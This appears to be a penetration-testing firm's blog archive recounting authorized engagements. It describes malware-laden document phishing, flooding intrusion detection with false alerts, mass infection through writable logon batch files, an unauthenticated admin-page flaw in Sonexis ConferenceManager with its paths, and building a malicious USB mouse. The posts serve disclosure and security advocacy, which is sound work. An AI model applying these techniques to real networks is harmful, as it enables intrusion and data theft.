Archive for the ‘Total Infrastructure Compromise’ Category

Whistleblower Series – The real problem with China isn’t China, its you.

Terms like China, APT and Zero-Day are synonymous with Fear, Uncertainty and Doubt (FUD).  The trouble is that, in our opinion anyway, these terms and respective news articles detract from the actual problem.  For example, in 2011 only 0.12% of compromises were attributed to zero-day exploitation and 99.88% were attributed to known vulnerabilities.  Yet, despite this fact the media continued to write about the zero-day threat as if it was a matter of urgency.  What they really should have been writing about is that the majority of people aren’t protecting their networks properly.  After all, if 99.88% of all compromises were the result of the exploitation of known vulnerabilities then someone must not have been doing their job. Moreover, if people are unable to protect their networks from the known threat then how are they ever going to defend against the unknown?

All of the recent press about China and their Advanced Persistent Threat is the same, it detracts from the real problem.  More clearly, the problem isn’t China, Anonymous, LulzSec, or any other FUD ridden buzzword.  The problem is that networks are not being maintained properly from a security perspective and so threats are aligning with risks to successfully affect penetration.  A large part of the reason why these networks are such soft targets is because  their maintainers are sold a false sense of security from both the services and technology perspective.

In this article we’ll show you how easy it was for us to hack into a sensitive government network that was guarded by industry technologies and testing best practices.  Our techniques deliberately mimicked those used by China.  You’ll notice that the  techniques aren’t particularly advanced (despite the fact that the press calls them Advanced) and in fact are based largely on common sense.  You’ll also notice that we don’t exploit a single vulnerability other than those that exist in a single employee (the human vulnerability).  Because this article is based on an actual engagement we’ve altered certain aspects of our story to protect our customer and their respective identity.  We should also make mention that since the delivery of this engagement our customer has taken effective steps to defeat this style of attack.

Here’s the story…

We recently (relatively speaking anyway) delivered a nation state style attack against one of our public sector customers.  In this particular case our testing was unrestricted and so we were authorized to perform Physical, Social and Electronic attacks.  We were also allowed to use any techniques and technologies that were available should we feel the need.

Lets start off by explaining that our customers network houses databases of sensitive information that would be damaging if exposed.  They also have significantly more political weight and authority than most of the other departments in their area.  The reason why they were interested in receiving a nation-state style Penetration Test is because another department within the same area had come under attack by China. 

We began our engagement with reconnaissance.  During this process we learned that the target network was reasonably well locked down from a technical perspective.  The external attack surface provided no services or application into which we could sink our teeth.  We took a few steps back and found that the supporting networks were equally protected from a technical perspective.  We also detected three points where Intrusion Prevention was taking place, one at the state level,  one at the department level, and one functioning at the host level.

(It was because of these protections and minimalistic attack surface that our client was considered by many to be highly secure.)

When we evaluated our customer from a social perspective we identified a list of all employees published on a web server hosted by a yet another  department.  We were able to build micro-dossiers for each employee by comparing employee names and locations to various social media sites and studying their respective accounts.  We quickly constructed a list of which employees were not active within specific social networking sites and lined them up as targets for impersonation just in case we might need to become someone else.

We also found a large document repository (not the first time we’ve found something like this) that was hosted by a different department.  Contained within this repository was a treasure trove of Microsoft Office files with respective change logs and associated usernames.  We quickly realized that this repository would be an easy way into our customers network.  Not only did it provide a wealth of META data, but it also provided perfect pretexts for Social Engineering… and yes, it was open to the public.

(It became glaringly apparent to us that our customer had overlooked their social points of risk and exposure and were highly reliant on technology to protect their infrastructure and information.  It was also apparent that our customer was unaware of their own security limitations with regards to technological protections.  Based on what we read in social forums, they thought that IPS/IDS and Antivirus technologies provided ample protection.)

We downloaded a Microsoft Office document that had a change log that indicated that it was being passed back and fourth between one of our customers employees and another employee in different department.  This was ideal because a trust relationship had already been established and was ripe for the taking.  Specifically, it was “normal” for one party to email this document to the other as a trusted attachment.  That normalcy provided the perfect pretext.

(Identifying a good pretext is critically important when planning on launching Social Engineering attacks.  A pretext is a good excuse or reason to do something that is not accurate.  Providing a good pretext to a victim often causes a victim to perform actions that they should not perform.)

Once our document was selected we had our research team build custom malware specifically for the purpose of embedding it into the Microsoft Office document.  As is the case with all of our malware, we built in automatic self-destruct features and expiration dates that would result in clean deinstallation when triggered.  We also built in covert communication capabilities as to help avoid detection.

(Building our own malware was not a requirement but it is something that we do.  Building custom malware ensures that it will not be detected, and it ensures that it will have the right features and functions for a particular engagement.)

Once the malware was built and embedded into the document we tested it in our lab network.  The malware functioned as designed and quickly established connectivity with its command and control servers.   We should mention that we don’t build our malware with the ability to propagate for liability and control reasons.  We like keeping our infections highly targeted and well within scope.

When we were ready to begin our attack we fired off a tool designed to generate a high-rate of false positives in Intrusion Detection / Prevention systems and Web Application Firewalls alike.  We ran that tool against our customers network and through hundreds of different proxies to force the appearance of multiple attack sources.  Our goal was to hide any real network activity behind a storm of false alarms.

(This demonstrates just how easily Intrusion Detection and Prevention systems can be defeated.   These systems trust network data and generate alerts based on that network data.  When an attacker forges network data then that attacker can also forge false alerts.   Generate enough false alerts and you disable ones ability to effectively monitor the real threat.)

While that tool was running we forged an email to our customers employee from the aforementioned trusted source.  That email contained our infected Microsoft Office document as an attachment.  Within less than three minutes our target received the email and opened the infected attachment thus activating our malware.  Once activated our malware connected back to its command and control server and we had successfully penetrated into our customer’s internal IT infrastructure.  We’ll call this initial point of Penetration T+1.  Shortly after T+1 we terminated our noise generation attack.

(The success of our infection demonstrates how ineffective antivirus technologies are at preventing infections from unknown types of malware.  T+1 was using a current and well respected antivirus solution.  That solution did not interfere with our activities.  The success of our penetration at this point further demonstrates the risk introduced by the human factor.  We did not exploit any technological vulnerability but instead exploited human trust.         )

Now that we had access we needed to ensure that we kept it.  One of the most important aspects of maintaining access is monitoring user activity.  We began taking screenshots of T+1’s desktop every 10 seconds.  One of those screenshots showed T+1 forwarding our email off to their IT department because they thought that the attachment looked suspicious.  While we were expecting to see rapid incident response, the response never came.  Instead, to our surprise, we received a secondary command and control connection from a newly infected host (T+2).

When we began exploring T+2 we quickly realized that it belonged to our customers head of IT Security.  We later learned that he received the email from T+1 and scanned the email with two different antivirus tools.  When the email came back as clean he opened the attachment and infected his own machine.  Suspecting nothing he continued to work as normal… and so did we.

Next we began exploring the file system for T+1. When we looked at the directory containing users batch files we realized that their Discretionary Access Control Lists (DACL’s) granted full permissions to anyone (not just domain users).  More clearly, we could read, write, modify and delete any of the batch files and so decided to exploit this condition to commit a mass compromise.

To make this a reality, our first task was to identify a share that would allow us to store our malware installer.  This share had to be accessible in such a way that when a batch file was run it could read and execute the installer.  As it turned out the domain controllers were configured with their entire C:\ drives shared and the same wide open DACL’s.

We located a path where other installation files were stored on one of the domain controllers.  We placed a copy of our malware into that location and named it “infection.exe”.  Then using a custom script we modified all user batch files to include one line that would run “infection.exe” whenever a user logged into a computer system.  The stage was set…

In no time we started receiving connections back from desktop users including but not limited to the desktops belonging to each domain admin.  We also received connections back from domain controllers, exchange servers, file repositories, etc.  Each time someone accessed a system it became infected and fell under our control.

While exploring the desktops for the domain administrators we found that one admin kept a directory called “secret”.   Within that directory were backups for all of the network devices including intrusion prevention systems, firewalls, switches, routers, antivirus, etc.  From that same directory we also extracted viso diagrams complete with IP addresses, system types, departments, employee telephone lists, addresses, emergency contact information, etc.

At this point we decided that our next step would be to crack all passwords.  We dumped passwords from the domain controller and extracted passwords from the backed up configuration files.  We then fed our hashes to our trusted cracking machine and successfully cracked 100% of the passwords.

(We should note that during the engagement we found that most users had not changed their passwords since their accounts had been created.  We later learned that this was a recommendation made by their IT staff.  The recommendation was based on an article that was written by a well-respected security figure. ).

With this done, we had achieved an irrecoverable and total infrastructure compromise.  Had we been a true foe then there would be no effective way to remove our presence from the network.  We achieved all of this without encountering any resistance, without exploiting a single technological vulnerability, without detection (other than the forwarded email of course) and without the help of China.  China might be hostile but then again so are we.

 

 

PDF Download    Send article as PDF   

Whistleblower Series – Don’t be naive, take the time to read and understand the proposal.

In our last whistleblower article, we showed that the vast majority of Penetration Testing vendors don’t actually sell Penetration Tests. We did this by deconstructing pricing methodologies and combining the results with common sense. We’re about to do the same thing to the industry average Penetration Testing proposal. Only this time we’re not just going to be critical of the vendors, we’re also going to be critical of the buyers.

A proposal is a written offer from seller to buyer that defines what services or products are being sold. When you take your car to the dealer, the dealer gives you a quote for work (the proposal). That proposal always contains an itemized list for parts and labor as well as details on what work needs to be done. That is the right way to build a service-based proposal.

The industry average Network Penetration Testing proposal fails to define the services being offered. Remember, the word ‘define’ means the exact meaning of something. When we read a network penetration testing proposal and we have to ask ourselves “so what is this vendor going to do for us?” then the proposal has clearly failed to define services.

For example, just recently we reviewed a proposal that talked about “Ethos” and offered optional services called “External Validation” and “External Quarterlies” but completely failed to explain what “External Validation” and “External Quarterlies” were. We also don’t really care about “Ethos” because it has nothing to do with the business offering. Moreover, this same proposal absolutely failed to define methodology and did not provide any insight into how testing would be done. The pricing section was simply a single line item with a dollar value, it wasn’t itemized. Sure the document promised to provide Penetration Testing services, but that’s all it really said (sort of).

This is problematic because Penetration Testing is a massively dynamic service that contains a potentially infinite amount of techniques (attacks and tests) for penetration attempts. Some of those techniques are higher threat than others; some are even higher risk than others. If a proposal doesn’t define the tests that will be done, how they will be done, what the risks are, etc.,  then the vendor is free to do whatever they want and call it a day. Most commonly this means doing the absolute minimum amount of work while making it look like a lot.

Here’s some food for thought…

Imagine that we are a bulletproof vest Penetration Testing Company. It’s our job to test the effectiveness of bulletproof vests for our customers so that they can guarantee the safety of their buyers. We deliver a proposal to a customer that is the same quality as the average Network Penetration Testing proposal and our customer signs the proposal.

A week later, we receive a shipment of vests for testing. We hang those vests on dummies made up of ballistics gel in our firing range. We then take our powerful squirt guns, stand ten feet down range and squirt away. After the test is complete, we evaluate the vests and determine that they were not penetrated and so passed the Penetration Test. Our customer hears the great news and begins selling the vest on the open market.

In the scenario above, both parties are to blame. The customer did not do their job because they failed to validate the proposal, to demand clear definitions, to assess the testing methodology, etc. Instead they naively trusted the vendor. The vendor failed to meet their ethical responsibilities because they offered a misleading and dishonest service that would do nothing more than promote a false sense of security. In the end, the cost in damages (loss of life) will be significantly higher than the cost of receiving genuine services. In the end, the customer will suffer as will their own customers.

Unfortunately, this is what is happening with the vast majority of Network Penetration Tests. Vendors are perceived as experts by their customers and are delivering proposals like the ones described above. Customers then naively evaluate proposals assuming that all vendors are created equal and make buying decisions based largely on cost. They receive services (usually not a genuine penetration test), put a check in the box and move onto the next task. In reality, the only thing they’ve bought is a false sense of security.

How do we avoid this?

While we can’t force Network Penetration Testing firms to hold themselves to a higher standard, their customers can. If customers took the time to truly evaluate Network Penetration Testing proposals (or any proposal for that matter) then this problem would be eradicated. The question is do customers really want high quality testing or do they just want a check in the box? In our experience, both types of customers exist but most seem to want a genuine and high-quality service.

Here are a few things that customers can do to hold their Network Penetration Testing vendor to a higher standard.

  • Make sure the engagement is properly scoped (we discussed this in our previous article)
  • Make sure the proposal uses terms that are clearly defined and make sense. For example, we saw a proposal just one week before writing this article that was for “Non-intrusive Network Penetration Testing.” Is it possible to penetrate into something without being intrusive? No.
  • Make sure that the proposal defines terms that are unique to the vendor. For example, the proposal that we mentioned previously talks about “External Quarterlies” but fails to explain what that means. Why are people signing proposals that make them pay for an undefined service? Would you sign it if it had a service called “Goofy Insurance”?
  • Make sure the vendor can explain how they came to the price points that are reflected in the proposal. Ask them to break it down for you and remember to read our first article so that you understand the differences between count based pricing (wrong) and attack surface based pricing (right).
  • (We’ll provide more points in the next article).

As the customer, it is up to you to hold a vendor’s feet to the fire (we expect it). When you purchase poor quality services that are mislabeled as “Penetration Tests” then you are enabling the snake-oil vendors to continue. This is a problem because it confuses those who want to purchase genuine and high-quality services. It makes their job exceedingly difficult and in some cases causes people to lose faith in the Network Penetration Testing industry as a whole.

If you feel that what we’ve posted here is inaccurate and can provide facts to prove the inaccuracy then please let us know. We don’t want to mislead anyone and will happily modify these entries to better reflect the truth.

Create PDF    Send article as PDF   

The 3 ways we owned you in 2012

Here are the top 3 risks that we leveraged to penetrate into our customers’ networks in 2012. Each of these has been used to affect an irrecoverable infrastructure compromise during multiple engagements across a range of different customers. We flag a compromise “irrecoverable” when we’ve successfully taken administrative control over 60% or more of the network-connected assets. You’ll notice that these risks are more human-oriented than they are technology-oriented, thus demonstrating that your people are your greatest risk. While we certainly do focus on technological risks, they don’t fall into the top three categories.

The general methodology that we follow to achieve an irrecoverable infrastructure compromise is depicted below at a high-level.

  1. Gain entry via a single point (one of the 3 referenced below)
  2. Install custom backdoor (RADON our safe, undetectable, home-grown pseudo-malware)
  3. Identify and penetrate the domain controller (surprisingly easy in most cases)
  4. Extract and crack the passwords (we have pretty rainbows and access to this GPU cracker)
  5. Propagate the attack to the rest of the network (Distributed Metastasis)

 

Social Engineering

Social Engineering is the art of manipulating people into divulging information or performing actions usually for the purpose of gaining access to a computer system or network connected resource. It is similar to fraud, but the attacker very rarely comes face-to-face with his or her victims. Today, Social Engineering is used to help facilitate the delivery of technological attacks like the planting of malware, spy devices, etc.

During an engagement in 2012, Netragard used Social Engineering to execute an irrecoverable infrastructure compromise against one of its healthcare customers. This was done through a job opportunity that was posted on our customers website. Specifically, our customer was looking to hire a Web Application Developer that understood how to design secure applications. We built an irresistible resume and established fake references, which quickly landed us an on-site interview. When we arrived, we were picked up by our contact and taken to his office. While sitting there, we asked him for a glass of water and he promptly left us alone in his office for roughly 2 minutes. During that time, we used a USB device to infect his desktop computer with RADON (our pseudo-malware). When he returned we thanked him for the water and continued on with the interview. In the end, we were offered the job but turned it down (imagine if we accepted it).

If you aren’t subjecting your staff to real social engineering then you aren’t receiving a realistic penetration test. While the example above represents an elevated threat, we test at a variety of different threat levels. The key is to keep it realistic.

Malware

The word malware is derived from “Malicious Software.”  Any software that was written for the purpose of being malicious is by definition malware. This includes but is not limited to trojans, worms, and viruses.  Today malware is evolving and is becoming harder and harder to detect. Most people are under the pretense that their antivirus software will protect them from malware when in reality their antivirus software is borderline useless. Antivirus software can only detect malware if it knows what to look for. This means that new, never before seen variants of malware are undetectable so long as they don’t behave in any known way that would trigger false positives but never the less result in detection. What’s more interesting is that we found that antivirus software can’t even detect known malware if the known malware has been packed.

We used RADON, our home-brew “safe” malware, in nearly every engagement in 2012. RADON is designed to enable us to infect customer systems in a safe and controllable manner. Safe means that every strand is built with an expiration date that, when reached, results in RADON performing an automatic and clean self-removal. Safe also means that we have the ability to tell RADON to deinstall at any point during the engagement should any customer make the request. RADON is 100% undetectable and will completely evade all antivirus software, intrusion prevention / detection systems, etc. Why did we build RADON? We built it because we need to have the same capabilities as the bad-guys, if not then our testing wouldn’t be realistic.

One last thing that you should know about malware is that it doesn’t usually exploit technological vulnerabilities to infect systems. Instead, it exploits human gullibility and we all know that humans are far more easy to exploit than technology! The “ILOVEYOU” worm is a prime example. The worm would email itself to a victim with a subject of “I LOVE YOU” and an attachment titled “LOVE-LETTER-FOR-YOU.txt.vbs,” which was actually a copy of the worm. When a person attempted to read the attachment, they would inadvertently run the copy and infect their own computer. Once infected, the worm would begin the process again and email copies of itself to the first 50 email addresses in the victim’s address book. This technique of exploiting gullibility was so successful that in the first 10 days, more than 50 million infections were reported. Had people spent more time educating each other about the risks of socially augmented technical attacks then the impact may have been significantly reduced.

Configuration Vulnerabilities

Configuration Vulnerabilities most commonly seem to be created when third parties deploy software on customer networks.  They often fail to remove setup files, default accounts, default credentials, etc.  As a result, hackers scan the internet for common configuration vulnerabilities and often use those to penetrate into affected systems.  Sometimes configuration vulnerabilities aren’t particularly useful other than being destructive.

For example, our team was recently performing an Advanced External Penetration Test for a small bank on the southern part of the east coast. This bank had an online banking web application that was deployed by a vendor. The portal worked fine, but the vendors consultant didn’t clean up the setup files after configuration. During our engagement, we performed directory enumeration against the poorly configured target using wfuzz (standard practice during any penetration testing engagement). Our enumerator identified a directory called “AppSetup” and when it requested the page from that directory we received a message that read “Database Initialized Successfully.” Yes, that’s right, simply visiting the page wiped out one of the bank’s customer databases. What’s more scary is that this was done from the internet, didn’t require any authentication, and was unavoidable for anyone that would have simply accessed that specific URL.

Another common Configuration Vulnerability exists within networks of all sizes and has everything to do with Active Directory and the account lockout after login failure setting. When delivering a Penetration Test to two separate customers in 2012 we inadvertently created a company-wide denial of service. In both cases, the reason for the outage was because the customer had bad configurations established in Active Directory. Specifically, their lockout after 3 login failures was set to 24 hours. During both engagements, we were authorized to perform password guessing attacks against all external points of authentication. During both engagements, we managed to lock out nearly every user account for a 24-hour period. One of the customers (a large bank) couldn’t remember their master domain admin password and so their outage was extended to nearly 24 hours. In this particular case, setting a lockout to 24 hours creates a critical availability impacting vulnerability. We really don’t see any point in setting your lockout to anything greater than 5 minutes (if you want to know why feel free to leave a comment).

In closing, configuration vulnerabilities are the product of unsafe configurations. What is unfortunate is that these vulnerabilities are almost always identified through triggering, which results in an outage or damage of some sort. It’s important to remember that its not our fault that your systems might not configured properly.

 

 

PDF    Send article as PDF   

Thank You Anonymous

We (Netragard) have been meaning to say Thank You to Anonymous for a long time now. With that said, Netragard does not condone the actions of Anonymous, nor the damage they have caused.   What Anonymous has demonstrated, and continues to demonstrate, is just how poorly most network infrastructures are managed from a security perspective (globally, not just within the USA).  People need to wake up.

If you take the time to look at most of the hacks done by Anonymous, you’ll find that their primary points of entry are really quite basic.  They often involve the exploitation of simple SQL Injection vulnerabilities, poorly configured servers, or even basic Social Engineering.  We’re not convinced that Anonymous is talentless; we just think that they haven’t had to use their talent because the targets are so soft.

What Anonymous has really exposed here are issues with the security industry as a whole and with the customers that are being serviced. Many of Anonymous’s victims use third party Penetration Testing vendors and nightly Vulnerability Scanning services.  Many of them even use “best of breed” Intrusion Prevention Systems and “state of the art” firewalls.  Despite this, Anonymous still succeeds at Penetration with relative ease, without detection and by exploiting easy to identify vulnerabilities.  So the question becomes, why is Anonymous so successful?

Part of the reason is that regulatory requirements like PCI DSS 11.3 (and others) shift businesses from wanting Penetration Tests for security reasons to needing Penetration Tests in order to satisfy regulatory requirements.  What is problematic is that most regulatory requirements provide no minimum quality standard for Penetration Testing.  They also provide no incentive for quality testing.  As a result, anyone with an automated vulnerability scanner and the ability to vet results can deliver bare minimum services and satisfy the requirement.

We’ll drive this point home with an analogy.  Suppose you manufacture bulletproof vests for the military.  Regulations state that each version of your vest must pass a Penetration Test before you can sell it to the military.   The regulations do not define a quality standard against which the vests should be tested.  Since your only goal is to satisfy regulations, you hire the lowest bidder.  They perform Penetration Testing against your bulletproof vest using a squirt gun.  Once testing is complete you receive a report stating that your vests passed the test.  Would you want to wear that vest into battle?  (Remember, Anonymous uses bullets not water).

This need to receive the so-called “Passing” Penetration Test has degraded the cumulative quality of Penetration Testing services.  There are far more low-quality testing firms than there are high-quality.  Adding to the issue is that the low-quality firms advertise their services using the same language, song and dance as high-quality firms.  This makes it difficult for anyone interested in purchasing high-quality services to differentiate between vendors.  (In fact, we’ve written a white paper about this very thing).

A possible solution to this problem would be for the various regulatory bodies to define a minimum quality standard for Penetration Testing.  This standard should force Penetration Testing firms to test realistically.  This means that they do not ask their customers to add their IP addresses to the whitelist for their Intrusion Prevention Systems or Web Application Firewalls.  It means that they require Social Engineering (including but not limited to the use of home-grown pseudomalware), it means that they test realistically, period.   If a vendor can’t test realistically then the vendor shouldn’t be in the testing business.

What this also means is that people who need Penetration Tests will no longer be able to find a low-cost, low-quality vendor to provide them with a basic check in the box.  Instead, they will actually need to harden their infrastructures or they won’t be compliant.

We should mention that not all business are in the market of purchasing low quality Penetration Testing services.  Some businesses seek out high-quality vendors and truly want to know where there vulnerabilities are.  They not only allow but also expect their selected Penetration Testing vendor to test realistically and use the same tactics and talent as the actual threat.  These types of businesses tend to be more secure than average and successfully avoid Anonymous’s victim list (at least so far). They understand that the cost of good security is equal to a fraction of the cost in damages of a single successful compromise but unfortunately not everyone understands that.

So is it really any surprise that Anonymous has had such a high degree of success?  We certainly don’t think so.  And again, while we don’t condone their actions, we can say thank you for proving our point.

Free PDF    Send article as PDF   

Hacking the Sonexis ConferenceManager

Netragard’s Penetration Testing services use a research based methodology called Real Time Dynamic Testing™. Research based methodologies are different in that they focus on identifying both new and known vulnerabilities whereas standard methodologies usually, if not always identify known vulnerabilities. Sometimes when performing research based penetration testing we identify issues that not only affect our customer but also have the potential to impact anyone using a particular technology. Such was the case with the Sonexis ConfrenceManager.

The last time we came across a Sonexis ConferenceManager we found a never before discovered Blind SQL Injection vulnerability.  This time we found a much more serious (also never before discovered) authorization vulnerability. We felt that this discovery deserved a blog entry to help make people aware of the issue as quickly as possible.

What really surprised about this vulnerability was its simplicity and the fact that nobody (not even us) had found it before.  Discovery and exploitation required no wizardry or special talent. We simply had to browse to the affected area of the application and we were given keys to the kingdom (literally). What was even more scary is that this vulnerability could lead to a mass compromise if automated with a specialized Google search (but we won’t give more detail on that here, yet).

So lets dig in…

All versions of the Sonexis ConferenceManager fail to check and see if users attempting to access  the “/admin/backup/settings.asp”, “/admin/backup/download.asp ” or the “/admin/backup/upload.asp ” pages are authorized. Because of this, anyone can browse to one of those pages without first authenticating.  When they do, they’ll have full administrative privileges over the respective Sonexis ConferenceManager pages.  A screen shot of the “settings.asp” age is provided below.

The first thing that we noticed when we accessed the page was that the fields were filled out for us.  This made us curious, especially since the credentials appeared to belong to our customers domain.  When we looked at the document source we found that we didn’t only have the “User ID:” but were also provided with the “Password:” in clear text.

As it turned out, compromising our customer’s IT infrastructure was as simple as using the disclosed credentials to VPN into their network.  Once in we used the same credentials to access Active Directory and to create a second domain administrator account called “netragard”.  We also downloaded the entire password table from Active Directory and began cracking that with hashcat.  While that was being cracked we used our new domain admin account to access any resource that authenticated against Active Directory.  Suffice it to say we had used the Sonexis ConferenceManager vulnerability to compromise the entire IT infrastructure.

But the vulnerabilities didn’t stop there…

As it turns out we could also download the Sonexis ConferenceManager Microsoft SQL database in its entirety.  This was done by changing the configuration in the “settings.asp” page.  Once changed to the right location we were able to download the database (after configuring samba locally).

 

After we downloaded the file (in zip format) we decompressed it.  Decompression revealed the following contents:

Once decompressed we loaded the files into our local MsSQL database and began to explore the contents.  Not only did we have audio recordings, configuration settings, and other sensitive data, but the administrative password for the Sonexis ConferenceManager was also stored in plain text as is shown in the screen shot below. This in and of its self is yet another vulnerability.

We were able to use the credentials to login to the Sonexis ConferenceManager without issue…

Last but not least…

We found that it was also possible to insert a backdoor into our local copy of the Sonexis ConferenceManager database.  Once the backdoor was created we could re-zip the files and upload the “infected” Microsoft SQL database back to the Sonexis ConferenceManager.  Once loaded, the backdoor will activate allowing the attacker to gain entry to the system (again).

Regarding vendor notification…

Sonexis was notified on 1/31/2012 about the authorization vulnerabilities disclosed in this article.  Sonexis responded once (with a less than friendly, non-cooperative response) on 2/1/2012 and a second time (with a very friendly cooperative response) on 2/6/2012.  We replied to the second response providing the full details of our research to Sonexis.  Sonexis took the information and had a quick fix ready for their customers the next day on 02/07/2012!  They notified their customers that same day with the following email.

We’d like to thank Sonexis for taking the time to be receptive and working with us.  Not only is that the right thing to do, but it showed us that Sonexis takes their customer security very seriously.  As it turned out the initial (less than friendly response) was due to a miscommunication (someone not paying attention to what we were telling them).  The second response came from someone else that was actually a great pleasure to work with.  Suffice it to say that in the end we were really quite impressed with how quickly Sonexis pushed out a fix (and yes it works, we verified that).

If you are a Sonexis ConferenceManager user we strongly urge you to update your system now.

Updated on: 02-16-2012

This vulnerability can be exploited from the Internet.   The image below shows a small sample of Sonexis ConferenceManager users who are vulnerable.  This sample was identified using a combination of ruby with a specially crafted google search.

 

 

 

 

 

 

 

 

 

PDF Creator    Send article as PDF   

Netragard’s Badge of Honor (Thank you McAfee)

Here at Netragard We Protect You From People Like Us™ and we mean it.  We don’t just run automated scans, massage the output, and draft you a report that makes you feel good.  That’s what many companies do.  Instead, we “hack” you with a methodology that is driven by hands on research, designed to create realistic and elevated levels of threat.  Don’t take our word for it though; McAfee has helped us prove it to the world.

Through their Threat Intelligence service, McAfee Labs listed Netragard as a “High Risk” due to the level of threat that we produced during a recent engagement.  Specifically, we were using a beta variant of our custom Meterbreter malware (not to be confused with Metasploit’s Meterpreter) during an Advanced Penetration Testing engagement.  The beta malware was identified and submitted to McAfee via our customers Incident Response process.  The result was that McAfee listed Netragard as a “High Risk”, which caught our attention (and our customers attention) pretty quickly.

McAfee Flags Netragard as a High Risk

Badge of Honor

McAfee was absolutely right; we are “High Risk”, or more appropriately, “High Threat”, which in our opinion is critically important when delivering quality Penetration Testing services.  After all, the purpose of a Penetration Test (with regards to I.T security) is to identify the presence of points where a real threat can make its way into or through your IT Infrastructure.  Testing at less than realistic levels of threat is akin to testing a bulletproof vest with a squirt gun.

Netragard uses a methodology that’s been dubbed Real Time Dynamic Testing™ (“RTDT”).  Real Time Dynamic Testing™ is a research driven methodology specifically designed to test the Physical, Electronic (networked and standalone) and Social attack surfaces at a level of threat that is slightly greater than what is likely to be faced in the real world.  Real Time Dynamic Testing™ requires that our Penetration Testers be capable of reverse engineering, writing custom exploits, building and modifying malware, etc.  In fact, the first rendition of our Meterbreter was created as a product of of this methodology.

Another important aspect of Real Time Dynamic Testing™ is the targeting of attack surfaces individually or in tandem.  The “Netragard’s Hacker Interface Device” article is an example of how Real Time Dynamic Testing™ was used to combine Social, Physical and Electronic attacks to achieve compromise against a hardened target.  Another article titled “Facebook from the hackers perspective” provides an example of socially augmented electronic attacks driven by our methodology.

It is important that we thank McAfee for two reasons.  First we thank McAfee for responding to our request to be removed from the “High Risk” list so quickly because it was preventing our customers from being able to access our servers.  Second and possibly more important, we thank McAfee for putting us on their “High Risk” list in the first place.  The mere fact that we were perceived as a “High Risk” by McAfee means that we are doing our job right.

PDF Printer    Send article as PDF   

Netragard’s Hacker Interface Device (HID).

We (Netragard) recently completed an engagement for a client with a rather restricted scope. The scope included a single IP address bound to a firewall that offered no services what so ever. It also excluded the use of social attack vectors based on social networks, telephone, or email and disallowed any physical access to the campus and surrounding areas. With all of these limitations in place, we were tasked with penetrating into the network from the perspective of a remote threat, and succeeded.

The first method of attack that people might think of when faced with a challenge like this is the use of the traditional autorun malware on a USB stick. Just mail a bunch of sticks to different people within the target company and wait for someone to plug it in; when they do its game over, they’re infected. That trick worked great back in the day but not so much any more. The first issue is that most people are well aware of the USB stick threat due to the many published articles about the subject. The second is that more and more companies are pushing out group policies that disable the autorun feature in Windows systems. Those two things don’t eliminate the USB stick threat, but they certainly have a significant impact on its level of success and we wanted something more reliable.

Enter PRION, the evil HID.


 

A prion is an infectious agent composed of a protein in a misfolded form. In our case the prion isn’t composed of proteins but instead is composed of electronics which include a teensy microcontroller, a micro USB hub (small one from RadioShack), a mini USB cable (we needed the ends) a micro flash drive (made from one of our Netragard USB Streamers), some home-grown malware (certainly not designed to be destructive), and a USB device like a mouse, missile turret, dancing stripper, chameleon, or whatever else someone might be tempted to plug in. When they do plug it in, they will be infected by our custom malware and we will use that point of infection to compromise the rest of the network.

For the purposes of this engagement we choose to use a fancy USB logitech mouse as our Hacker Interface Device / Attack Platform. To turn our logitech Human Interface Device into a Hacker Interface Device, we had to make some modifications. The first step of course was to remove the screw from the bottom of the mouse and pop it open. Once we did that we disconnected the USB cable from the circuit board in the mouse and put that to the side. Then we proceed to use a drummel tool to shave away the extra plastic on the inside cover of the mouse. (There were all sorts of tabs that we could sacrifice). The removal of the plastic tabs was to make room for the new hardware.

Once the top of the mouse was gutted and all the unnecessary parts removed we began to focus on the USB hub. The first thing we had to do was to extract the board from the hub. Doing that is a lot harder than it sounds because the hub that we chose was glued together and we didn’t want to risk breaking the internals by being too rough. After about 15 minutes of prying with a small screwdriver (and repeated accidental hand stabbing) we were able to pull the board out from the plastic housing. We then proceeded to strip the female USB connectors off of the board by heating their respective pins to melt the solder (careful not to burn the board). Once those were extracted we were left with a naked USB hub circuit board that measured about half an inch long and was no wider than a small bic lighter.

With the mouse and the USB board prepared we began the process of soldering. The first thing that we did was to take the mini USB cable, cut one of the ends off leaving about 1 inch of wire near the connector. Then we stripped all plastic off of the connector and stripped a small amount of wire from the 4 internal wires. We soldered those four wires to the USB board making sure to follow theright pinout pattern. This is the cable that will plug into the teensy mini USB port when we insert the teensy microcontroller.

Once that was finished we took the USB cable that came with the mouse and cut the circuit board connector off of the end leaving 2 inchs of wire attached. We stripped the tips of the 4 wires still attached to the connector and soldered those to the USB hub making sure to follow the right pinout patterns mentioned above. This is an important cable as its the one that connects the USB hub to the mouse. If this cable is not soldered properly and the connections fail, then the mouse will not work. We then took the other piece of the mouse cable (the longer part) and soldered that to the USB board. This is the cable that will connect the mouse to the USB port on the computer.

At this point we have three cables soldered to the USB hub. Just to recap those cables are the mouse connector cable, the cable that goes from the mouse to the computer, and the mini USB adapter cable for the teensy device. The next and most challenging part of this is to solder the USB flash drive to the USB hub. This is important because the USB flash drive is where we store our malware. If the drive isn’t soldered on properly then we won’t be able to store our malware on the drive and the the attack would be mostly moot. ( We say mostly because we could still instruct the mouse to fetch the malware from a website, but that’s not covert.)

To solder the flash drive to the USB hub we cut about 2 inches of cable from the mini USB connector that we stole the end from previously. We stripped the ends of the wires in the cable and carefully soldered the ends to the correct points on the flash drive. Once that was done we soldered the other ends of the cable to the USB hub. At that point we had everything soldered together and had to fit it all back into the mouse. Assembly was pretty easy because we were careful to use as little material as possible while still giving us the flexibility that we needed. We wrapped the boards and wires in single layers of electrical tape as to avoid any shorts. Once everything was we plugged in we tested the devices. The USB drive mounted, the teensy card was programmable, and the mouse worked.

Time to give prion the ability to infect…

We learned that the client was using Mcafee as their antivirus solution because one of their employees was complaining about it on Facebook. Remember, we weren’t allowed to use social networks for social engineering but we certainly were allowed to do reconnaissance against social networks. With Mcafee in our sights we set out to create custom malware for the client (as we do for any client and their respective antivirus solution when needed). We wanted our malware to be able to connect back to Metasploit because we love the functionality, we also wanted the capabilities provided by meterpreter, but we needed more than that. We needed our malware to be fully undetectable and to subvert the “Do you want to allow this connection” dialogue box entirely. You can’t do that with encoding…

Update: As of 06/29/2011 9AM EST: this variant of our pseudomalware is being detected by Mcafee.

Update: As of 06/29/2011 10:47AM EST: we’ve created a new variant that seems to bypass any AV.

